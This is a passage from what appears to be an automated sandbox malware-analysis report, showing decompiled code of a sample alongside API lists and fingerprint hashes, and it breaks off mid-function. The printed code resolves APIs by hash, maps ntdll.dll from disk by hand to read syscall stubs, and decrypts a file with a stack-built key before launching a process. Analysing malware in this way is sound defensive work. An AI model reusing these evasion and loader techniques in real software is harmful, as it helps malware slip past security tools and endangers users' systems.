                                                                                                                                                                                                          				short _v104;
                                                                                                                                                                                                          				short _v106;
                                                                                                                                                                                                          				char _v108;
                                                                                                                                                                                                          				short _t141;
                                                                                                                                                                                                          				short _t142;
                                                                                                                                                                                                          				short _t143;
                                                                                                                                                                                                          				short _t144;
                                                                                                                                                                                                          				short _t145;
                                                                                                                                                                                                          				short _t146;
                                                                                                                                                                                                          				short _t147;
                                                                                                                                                                                                          				short _t148;
                                                                                                                                                                                                          				short _t149;
                                                                                                                                                                                                          				int _t165;
                                                                                                                                                                                                          				signed int _t169;
                                                                                                                                                                                                          				intOrPtr _t175;
                                                                                                                                                                                                          				signed int _t195;
                                                                                                                                                                                                          				signed int _t210;
                                                                                                                                                                                                          				signed int _t222;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_v24 = _v24 & 0x00000000;
                                                                                                                                                                                                          				_v48 = _v48 & 0x00000000;
                                                                                                                                                                                                          				_v8 = _v8 & 0x00000000;
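                                                                                                                                                                                                          				/* _v108 through _v90 are filled one 16-bit code unit at a time: 6e 74 64 6c 6c 2e 64 6c 6c 00 is the UTF-16 stack string "ntdll.dll". */
                                                                                                                                                                                                          				_t141 = 0x6e;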
                                                                                                                                                                                                          				_v108 = _t141;
                                                                                                                                                                                                          				_t142 = 0x74;
                                                                                                                                                                                                          				_v106 = _t142;
                                                                                                                                                                                                          				_t143 = 0x64;
                                                                                                                                                                                                          				_v104 = _t143;
                                                                                                                                                                                                          				_t144 = 0x6c;
                                                                                                                                                                                                          				_v102 = _t144;
                                                                                                                                                                                                          				_t145 = 0x6c;
                                                                                                                                                                                                          				_v100 = _t145;
                                                                                                                                                                                                          				_t146 = 0x2e;
                                                                                                                                                                                                          				_v98 = _t146;
                                                                                                                                                                                                          				_t147 = 0x64;
                                                                                                                                                                                                          				_v96 = _t147;
                                                                                                                                                                                                          				_t148 = 0x6c;
                                                                                                                                                                                                          				_v94 = _t148;
                                                                                                                                                                                                          				_t149 = 0x6c;
                                                                                                                                                                                                          				_v92 = _t149;
                                                                                                                                                                                                          				_v90 = 0;
                                                                                                                                                                                                          				_v16 = _v16 & 0x00000000;
                                                                                                                                                                                                          				_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                          				_v36 = _v36 & 0x00000000;
                                                                                                                                                                                                          				_t23 =  &_v44;
                                                                                                                                                                                                          				 *_t23 = _v44 & 0x00000000;
                                                                                                                                                                                                          				_t222 =  *_t23;
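                                                                                                                                                                                                          				/* E722F4634 takes the value returned by E722F458C plus a 32-bit constant, and its results are later called as function pointers (e.g. _v68 below); this is consistent with API resolution by hash instead of by import. */
                                                                                                                                                                                                          				_v20 = E722F458C();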
                                                                                                                                                                                                          				_v64 = E722F4634(_v20, 0x8a111d91);
                                                                                                                                                                                                          				_v68 = E722F4634(_v20, 0x170c1ca1);
                                                                                                                                                                                                          				_v52 = E722F4634(_v20, 0xa5f15738);
                                                                                                                                                                                                          				_v72 = E722F4634(_v20, 0x433a3842);
                                                                                                                                                                                                          				_v56 = E722F4634(_v20, 0xd6eb2188);
                                                                                                                                                                                                          				_v60 = E722F4634(_v20, 0x50a26af);
                                                                                                                                                                                                          				_v80 = E722F4634(_v20, 0x55e38b1f);
                                                                                                                                                                                                          				_v44 = 1;
                                                                                                                                                                                                          				while(1) {
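                                                                                                                                                                                                          					/* Opens the path E722F478F derives from the stack string, read-only: 0x80000000 = GENERIC_READ, 7 = FILE_SHARE_READ|FILE_SHARE_WRITE|FILE_SHARE_DELETE, 3 = OPEN_EXISTING, 0x80 = FILE_ATTRIBUTE_NORMAL. */
                                                                                                                                                                                                          					_v16 = CreateFileW(E722F478F(_t222,  &_v108), 0x80000000, 7, 0, 3, 0x80, 0);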
                                                                                                                                                                                                          					if(_v16 == 0xffffffff) {
                                                                                                                                                                                                          						break;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_v36 = _v68(_v16, 0);
                                                                                                                                                                                                          					__eflags = _v36 - 0xffffffff;
                                                                                                                                                                                                          					if(_v36 != 0xffffffff) {
                                                                                                                                                                                                          						_v12 = VirtualAlloc(0, _v36, 0x3000, 4);
                                                                                                                                                                                                          						__eflags = _v12;
                                                                                                                                                                                                          						if(_v12 != 0) {
                                                                                                                                                                                                          							_t165 = ReadFile(_v16, _v12, _v36,  &_v88, 0);
                                                                                                                                                                                                          							__eflags = _t165;
                                                                                                                                                                                                          							if(_t165 != 0) {
                                                                                                                                                                                                          								_v76 = _v12;
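                                                                                                                                                                                                          								/* PE header walk over the bytes read from disk: +0x3c = e_lfanew, so _v32 is the NT headers; +0x14 = SizeOfOptionalHeader and +0x18 = start of the optional header, so _v40 is the first section header; +0x50 = SizeOfImage, +0x54 = SizeOfHeaders. */
                                                                                                                                                                                                          								_v32 = _v12 +  *((intOrPtr*)(_v76 + 0x3c));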
                                                                                                                                                                                                          								_t169 =  *(_v32 + 0x14) & 0x0000ffff;
                                                                                                                                                                                                          								_t213 = _v32;
                                                                                                                                                                                                          								_t68 = _t169 + 0x18; // 0x8000018
                                                                                                                                                                                                          								_v40 = _v32 + _t68;
                                                                                                                                                                                                          								_v24 = VirtualAlloc(0,  *(_v32 + 0x50), 0x3000, 4);
                                                                                                                                                                                                          								__eflags = _v24;
                                                                                                                                                                                                          								if(_v24 != 0) {
                                                                                                                                                                                                          									E722F45A4(_t213, _v24, _v12,  *((intOrPtr*)(_v32 + 0x54)));
                                                                                                                                                                                                          									_v28 = _v28 & 0x00000000;
                                                                                                                                                                                                          									while(1) {
                                                                                                                                                                                                          										_t175 = _v32;
                                                                                                                                                                                                          										__eflags = _v28 - ( *(_t175 + 6) & 0x0000ffff);
                                                                                                                                                                                                          										if(_v28 >= ( *(_t175 + 6) & 0x0000ffff)) {
                                                                                                                                                                                                          											break;
                                                                                                                                                                                                          										}
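                                                                                                                                                                                                          										/* One 0x28-byte section header per iteration (loop bound at NT headers +6 = NumberOfSections): E722F45A4 is used as a copy of SizeOfRawData (+0x10) bytes from file offset PointerToRawData (+0x14) to VirtualAddress (+0xc) inside _v24, i.e. the file is laid out in memory by hand rather than through the loader. */
                                                                                                                                                                                                          										E722F45A4(_v40, _v24 +  *((intOrPtr*)(_v40 + 0xc + _v28 * 0x28)), _v12 +  *((intOrPtr*)(_v40 + 0x14 + _v28 * 0x28)),  *((intOrPtr*)(_v40 + 0x10 + _v28 * 0x28)));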
                                                                                                                                                                                                          										_t210 = _v28 + 1;
                                                                                                                                                                                                          										__eflags = _t210;
                                                                                                                                                                                                          										_v28 = _t210;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_v48 = E722F4634(_v24, _a4);
                                                                                                                                                                                                          									__eflags = _v48;
                                                                                                                                                                                                          									if(_v48 != 0) {
                                                                                                                                                                                                          										__eflags = _v16;
                                                                                                                                                                                                          										if(_v16 != 0) {
                                                                                                                                                                                                          											CloseHandle(_v16);
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										__eflags = _v12;
                                                                                                                                                                                                          										if(_v12 != 0) {
                                                                                                                                                                                                          											VirtualFree(_v12, 0, 0x8000);
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										_v44 = _v44 & 0x00000000;
                                                                                                                                                                                                          										__eflags = 0;
                                                                                                                                                                                                          										if(0 != 0) {
                                                                                                                                                                                                          											continue;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					L22:
                                                                                                                                                                                                          					if(_v44 != 0) {
                                                                                                                                                                                                          						if(_v16 != 0) {
                                                                                                                                                                                                          							_v56(_v16);
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_v80(0);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_v8 = _v48;
                                                                                                                                                                                                          					while(1 != 0) {
                                                                                                                                                                                                          						if(( *_v8 & 0x000000ff) != 0xb8) {
                                                                                                                                                                                                          							__eflags = ( *_v8 & 0x000000ff) - 0xe9;
                                                                                                                                                                                                          							if(( *_v8 & 0x000000ff) != 0xe9) {
                                                                                                                                                                                                          								__eflags = ( *_v8 & 0x000000ff) - 0xea;
                                                                                                                                                                                                          								if(( *_v8 & 0x000000ff) != 0xea) {
                                                                                                                                                                                                          									_t195 = _v8 + 1;
                                                                                                                                                                                                          									__eflags = _t195;
                                                                                                                                                                                                          									_v8 = _t195;
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									_v8 =  *(_v8 + 1);
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_t125 =  *(_v8 + 1) + 5; // 0x5
                                                                                                                                                                                                          								_v8 = _v8 + _t125;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						break;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_v8 = _v8 + 1;
                                                                                                                                                                                                          					_v84 =  *_v8;
                                                                                                                                                                                                          					if(_v24 != 0) {
                                                                                                                                                                                                          						VirtualFree(_v24, 0, 0x8000);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					return _v84;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				goto L22;
                                                                                                                                                                                                          			}
                                                                                                                                                                                                          0x722f395d
                                                                                                                                                                                                          0x722f395d
                                                                                                                                                                                                          0x722f3962
                                                                                                                                                                                                          0x722f3962
                                                                                                                                                                                                          0x722f3968
                                                                                                                                                                                                          0x722f396b
                                                                                                                                                                                                          0x722f397b
                                                                                                                                                                                                          0x722f3985
                                                                                                                                                                                                          0x722f398a
                                                                                                                                                                                                          0x722f39a4
                                                                                                                                                                                                          0x722f39a9
                                                                                                                                                                                                          0x722f39b9
                                                                                                                                                                                                          0x722f39b9
                                                                                                                                                                                                          0x722f39ba
                                                                                                                                                                                                          0x722f39ab
                                                                                                                                                                                                          0x722f39b1
                                                                                                                                                                                                          0x722f39b1
                                                                                                                                                                                                          0x722f398c
                                                                                                                                                                                                          0x722f3995
                                                                                                                                                                                                          0x722f3999
                                                                                                                                                                                                          0x722f3999
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x722f397d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x722f397b
                                                                                                                                                                                                          0x722f39c3
                                                                                                                                                                                                          0x722f39cb
                                                                                                                                                                                                          0x722f39d2
                                                                                                                                                                                                          0x722f39de
                                                                                                                                                                                                          0x722f39de
                                                                                                                                                                                                          0x722f39e7
                                                                                                                                                                                                          0x722f39e7
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 722F3811
                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 722F39DE
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2167863165.00000000722F3000.00000040.00020000.sdmp, Offset: 722F0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167849303.00000000722F0000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167854070.00000000722F1000.00000080.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167858720.00000000722F2000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167867973.00000000722F5000.00000002.00020000.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateFileFreeVirtual
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 204039940-0
                                                                                                                                                                                                          • Opcode ID: 1a27eacef18cec4e83dd66d6f105d4ce73f2ffecc6ce0885b3943496d180ad0d
                                                                                                                                                                                                          • Instruction ID: fd2b217d06061070944677689e0e2c4f6c4d9d486b0fa98e146ec4fbcce3de6c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a27eacef18cec4e83dd66d6f105d4ce73f2ffecc6ce0885b3943496d180ad0d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 30A1F170D14249EFDF11CFE8C985BADFBB1BF08315F20845AEA11BA2A4D3759A91DB10
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E0040583A(CHAR* _a4) {
                                                                                                                                                                                                          				struct _SECURITY_ATTRIBUTES _v16;
                                                                                                                                                                                                          				struct _SECURITY_DESCRIPTOR _v36;
                                                                                                                                                                                                          				int _t22;
                                                                                                                                                                                                          				long _t23;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                                                                                                                                                                          				_v36.Owner = 0x408384;
                                                                                                                                                                                                          				_v36.Group = 0x408384;
                                                                                                                                                                                                          				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                                                                                                                                                                          				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                                                                                                                                                                          				_v16.lpSecurityDescriptor =  &_v36;
                                                                                                                                                                                                          				_v36.Revision = 1;
                                                                                                                                                                                                          				_v36.Control = 4;
                                                                                                                                                                                                          				_v36.Dacl = 0x408374;
                                                                                                                                                                                                          				_v16.nLength = 0xc;
                                                                                                                                                                                                          				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
                                                                                                                                                                                                          				if(_t22 != 0) {
                                                                                                                                                                                                          					L1:
                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t23 = GetLastError();
                                                                                                                                                                                                          				if(_t23 == 0xb7) {
                                                                                                                                                                                                          					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
                                                                                                                                                                                                          						goto L1;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					return GetLastError();
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return _t23;
                                                                                                                                                                                                          			}








                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040587D
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00405891
                                                                                                                                                                                                          • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004058A6
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004058B0
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • C:\Users\Public, xrefs: 0040583A
                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405860
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\Public
                                                                                                                                                                                                          • API String ID: 3449924974-2845914341
                                                                                                                                                                                                          • Opcode ID: df2ca303ac227c9e0d0fbc5e27afd1aa0bff8a01fb2d8cf1edb312bec269ebc1
                                                                                                                                                                                                          • Instruction ID: 86bcb966140a1f7c96d74b09234fd9797acdbeb10da2454792965a81b57d7874
                                                                                                                                                                                                          • Opcode Fuzzy Hash: df2ca303ac227c9e0d0fbc5e27afd1aa0bff8a01fb2d8cf1edb312bec269ebc1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80011A72D00219DAEF10DFA0C944BEFBBB8EF04355F00803ADA45B6290D7799659CF99
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E004065E8(intOrPtr _a4) {
                                                                                                                                                                                                          				char _v292;
                                                                                                                                                                                                          				int _t10;
                                                                                                                                                                                                          				struct HINSTANCE__* _t14;
                                                                                                                                                                                                          				void* _t16;
                                                                                                                                                                                                          				void* _t21;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t10 = GetSystemDirectoryA( &_v292, 0x104);
                                                                                                                                                                                                          				if(_t10 > 0x104) {
                                                                                                                                                                                                          					_t10 = 0;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
                                                                                                                                                                                                          					_t16 = 1;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t16 = 0;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t5 = _t16 + 0x40a014; // 0x5c
                                                                                                                                                                                                          				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
                                                                                                                                                                                                          				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
                                                                                                                                                                                                          				return _t14;
                                                                                                                                                                                                          			}









                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004065FF
                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00406638
                                                                                                                                                                                                          • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040664C
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp
• Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp
• Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp
• Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp
• Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                                          • String ID: %s%s.dll$UXTHEME$\
                                                                                                                                                                                                          • API String ID: 2200240437-4240819195
                                                                                                                                                                                                          • Opcode ID: dd037f00298a2975fe7e642a10d0852ddcb34bcb2038a79f7270f2bd0b83f80d
                                                                                                                                                                                                          • Instruction ID: 7902db4e393e31f005eed81eae05c73ad43ba894215c6af4be7b8d9a3309d3f8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: dd037f00298a2975fe7e642a10d0852ddcb34bcb2038a79f7270f2bd0b83f80d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26F0217050020967EB149764DD0DFFB375CAB08304F14047BA586F10D1DAB9D5358F6D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 71%
                                                                                                                                                                                                          			E722F42C8(void* __ecx, void* __edx, void* __eflags, WCHAR* _a4) {
                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                          				char _v24;
                                                                                                                                                                                                          				char _v25;
                                                                                                                                                                                                          				char _v26;
                                                                                                                                                                                                          				char _v27;
                                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                                          				char _v29;
                                                                                                                                                                                                          				char _v30;
                                                                                                                                                                                                          				char _v31;
                                                                                                                                                                                                          				char _v32;
                                                                                                                                                                                                          				char _v33;
                                                                                                                                                                                                          				char _v34;
                                                                                                                                                                                                          				char _v35;
                                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                                          				char _v37;
                                                                                                                                                                                                          				char _v38;
                                                                                                                                                                                                          				char _v39;
                                                                                                                                                                                                          				char _v40;
                                                                                                                                                                                                          				char _v41;
                                                                                                                                                                                                          				char _v42;
                                                                                                                                                                                                          				char _v43;
                                                                                                                                                                                                          				char _v44;
                                                                                                                                                                                                          				char _v45;
                                                                                                                                                                                                          				char _v46;
                                                                                                                                                                                                          				char _v47;
                                                                                                                                                                                                          				char _v48;
                                                                                                                                                                                                          				char _v49;
                                                                                                                                                                                                          				char _v50;
                                                                                                                                                                                                          				char _v51;
                                                                                                                                                                                                          				char _v52;
                                                                                                                                                                                                          				char _v53;
                                                                                                                                                                                                          				char _v54;
                                                                                                                                                                                                          				char _v55;
                                                                                                                                                                                                          				char _v56;
                                                                                                                                                                                                          				intOrPtr _v60;
                                                                                                                                                                                                          				intOrPtr _v64;
                                                                                                                                                                                                          				intOrPtr _v68;
                                                                                                                                                                                                          				intOrPtr _v72;
                                                                                                                                                                                                          				intOrPtr _v76;
                                                                                                                                                                                                          				intOrPtr _v80;
                                                                                                                                                                                                          				long _v84;
                                                                                                                                                                                                          				intOrPtr _v88;
                                                                                                                                                                                                          				intOrPtr _v92;
                                                                                                                                                                                                          				intOrPtr _v96;
                                                                                                                                                                                                          				intOrPtr _v100;
                                                                                                                                                                                                          				intOrPtr _v104;
                                                                                                                                                                                                          				intOrPtr _v108;
                                                                                                                                                                                                          				intOrPtr _v112;
                                                                                                                                                                                                          				signed int _v116;
                                                                                                                                                                                                          				intOrPtr _v120;
                                                                                                                                                                                                          				intOrPtr _v124;
                                                                                                                                                                                                          				char _v140;
                                                                                                                                                                                                          				char _v208;
                                                                                                                                                                                                          				char _v1248;
                                                                                                                                                                                                          				signed int _t124;
                                                                                                                                                                                                          				void* _t126;
                                                                                                                                                                                                          				void* _t130;
                                                                                                                                                                                                          				signed int _t131;
                                                                                                                                                                                                          				void* _t132;
                                                                                                                                                                                                          				int _t134;
                                                                                                                                                                                                          				int _t137;
                                                                                                                                                                                                          				signed int _t147;
                                                                                                                                                                                                          				void* _t149;
                                                                                                                                                                                                          				signed int _t150;
                                                                                                                                                                                                          				void* _t152;
                                                                                                                                                                                                          				signed int _t153;
                                                                                                                                                                                                          				void* _t155;
                                                                                                                                                                                                          				void* _t156;
                                                                                                                                                                                                          				void* _t157;
                                                                                                                                                                                                          				void* _t158;
                                                                                                                                                                                                          				void* _t159;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t159 = __eflags;
                                                                                                                                                                                                          				_t157 = __edx;
                                                                                                                                                                                                          				_t156 = __ecx;
                                                                                                                                                                                                          				_v20 = _v20 & 0x00000000;
                                                                                                                                                                                                          				_v84 = _v84 & 0x00000000;
                                                                                                                                                                                                          				_v56 = 0x37;
                                                                                                                                                                                                          				_v55 = 0x33;
                                                                                                                                                                                                          				_v54 = 0x64;
                                                                                                                                                                                                          				_v53 = 0x36;
                                                                                                                                                                                                          				_v52 = 0x31;
                                                                                                                                                                                                          				_v51 = 0x37;
                                                                                                                                                                                                          				_v50 = 0x32;
                                                                                                                                                                                                          				_v49 = 0x38;
                                                                                                                                                                                                          				_v48 = 0x39;
                                                                                                                                                                                                          				_v47 = 0x64;
                                                                                                                                                                                                          				_v46 = 0x38;
                                                                                                                                                                                                          				_v45 = 0x39;
                                                                                                                                                                                                          				_v44 = 0x34;
                                                                                                                                                                                                          				_v43 = 0x35;
                                                                                                                                                                                                          				_v42 = 0x63;
                                                                                                                                                                                                          				_v41 = 0x32;
                                                                                                                                                                                                          				_v40 = 0x39;
                                                                                                                                                                                                          				_v39 = 0x39;
                                                                                                                                                                                                          				_v38 = 0x62;
                                                                                                                                                                                                          				_v37 = 0x31;
                                                                                                                                                                                                          				_v36 = 0x64;
                                                                                                                                                                                                          				_v35 = 0x62;
                                                                                                                                                                                                          				_v34 = 0x35;
                                                                                                                                                                                                          				_v33 = 0x33;
                                                                                                                                                                                                          				_v32 = 0x65;
                                                                                                                                                                                                          				_v31 = 0x36;
                                                                                                                                                                                                          				_v30 = 0x66;
                                                                                                                                                                                                          				_v29 = 0x33;
                                                                                                                                                                                                          				_v28 = 0x35;
                                                                                                                                                                                                          				_v27 = 0x64;
                                                                                                                                                                                                          				_v26 = 0x30;
                                                                                                                                                                                                          				_v25 = 0x35;
                                                                                                                                                                                                          				_v24 = 0;
                                                                                                                                                                                                          				_v16 = _v16 & 0x00000000;
                                                                                                                                                                                                          				_v116 = _v116 & 0x00000000;
                                                                                                                                                                                                          				_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                          				_v8 = E722F458C();
                                                                                                                                                                                                          				_v60 = E722F4634(_v8, 0x34cf0bf);
                                                                                                                                                                                                          				_v64 = E722F4634(_v8, 0x55e38b1f);
                                                                                                                                                                                                          				_v68 = E722F4634(_v8, 0xd1775dc4);
                                                                                                                                                                                                          				_v120 = E722F4634(_v8, 0xd6eb2188);
                                                                                                                                                                                                          				_v96 = E722F4634(_v8, 0xa2eae210);
                                                                                                                                                                                                          				_v124 = E722F4634(_v8, 0xcd8538b2);
                                                                                                                                                                                                          				_v72 = E722F4634(_v8, 0x8a111d91);
                                                                                                                                                                                                          				_v76 = E722F4634(_v8, 0x170c1ca1);
                                                                                                                                                                                                          				_v80 = E722F4634(_v8, 0xa5f15738);
                                                                                                                                                                                                          				_v88 = E722F4634(_v8, 0x433a3842);
                                                                                                                                                                                                          				_v92 = E722F4634(_v8, 0x2ffe2c64);
                                                                                                                                                                                                          				_v112 = 0x2d734193;
                                                                                                                                                                                                          				_v108 = 0x63daa681;
                                                                                                                                                                                                          				_v104 = 0x26090612;
                                                                                                                                                                                                          				_v100 = 0x6f28fae0;
                                                                                                                                                                                                          				_t124 = 4;
                                                                                                                                                                                                          				_t126 = E722F4225(_t159,  *((intOrPtr*)(_t158 + _t124 * 0 - 0x6c))); // executed
                                                                                                                                                                                                          				_t160 = _t126;
                                                                                                                                                                                                          				if(_t126 != 0) {
                                                                                                                                                                                                          					L4:
                                                                                                                                                                                                          					_v60(0x7918);
                                                                                                                                                                                                          					L5:
                                                                                                                                                                                                          					_v68(0,  &_v1248, 0x103);
                                                                                                                                                                                                          					_t130 = CreateFileW(_a4, 0x80000000, 7, 0, 3, 0x80, 0);
                                                                                                                                                                                                          					_v20 = _t130;
                                                                                                                                                                                                          					if(_v20 != 0xffffffff) {
                                                                                                                                                                                                          						_t131 = _v76(_v20, 0);
                                                                                                                                                                                                          						_v16 = _t131;
                                                                                                                                                                                                          						__eflags = _v16 - 0xffffffff;
                                                                                                                                                                                                          						if(_v16 != 0xffffffff) {
                                                                                                                                                                                                          							_t132 = VirtualAlloc(0, _v16, 0x3000, 4);
                                                                                                                                                                                                          							_v12 = _t132;
                                                                                                                                                                                                          							__eflags = _v12;
                                                                                                                                                                                                          							if(_v12 != 0) {
                                                                                                                                                                                                          								_t134 = ReadFile(_v20, _v12, _v16,  &_v84, 0);
                                                                                                                                                                                                          								__eflags = _t134;
                                                                                                                                                                                                          								if(_t134 != 0) {
                                                                                                                                                                                                          									_t99 =  &_v56; // 0x37
                                                                                                                                                                                                          									E722F4029(_v12, _t99, 0x20);
                                                                                                                                                                                                          									_t137 = E722F3034(_t156, _t157, __eflags, _v12); // executed
                                                                                                                                                                                                          									__eflags = _t137;
                                                                                                                                                                                                          									if(_t137 != 0) {
                                                                                                                                                                                                          										_v60(0xbb8);
                                                                                                                                                                                                          										E722F3005(_t156,  &_v140, 0x10);
                                                                                                                                                                                                          										E722F3005(_t156,  &_v208, 0x44);
                                                                                                                                                                                                          										_t137 = _v96( &_v1248, _v92(0, 0, 0, 0x20, 0, 0,  &_v208,  &_v140));
                                                                                                                                                                                                          										__eflags = _t137;
                                                                                                                                                                                                          										if(_t137 != 0) {
                                                                                                                                                                                                          											_t137 = _v64(0);
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									ExitProcess(0);
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								return _t134;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							return _t132;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						return _t131;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					return _t130;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t147 = 4;
                                                                                                                                                                                                          				_t149 = E722F4225(_t160,  *((intOrPtr*)(_t158 + (_t147 << 0) - 0x6c))); // executed
                                                                                                                                                                                                          				_t161 = _t149;
                                                                                                                                                                                                          				if(_t149 != 0) {
                                                                                                                                                                                                          					goto L4;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t150 = 4;
                                                                                                                                                                                                          				_t152 = E722F4225(_t161,  *((intOrPtr*)(_t158 + (_t150 << 1) - 0x6c))); // executed
                                                                                                                                                                                                          				_t162 = _t152;
                                                                                                                                                                                                          				if(_t152 != 0) {
                                                                                                                                                                                                          					goto L4;
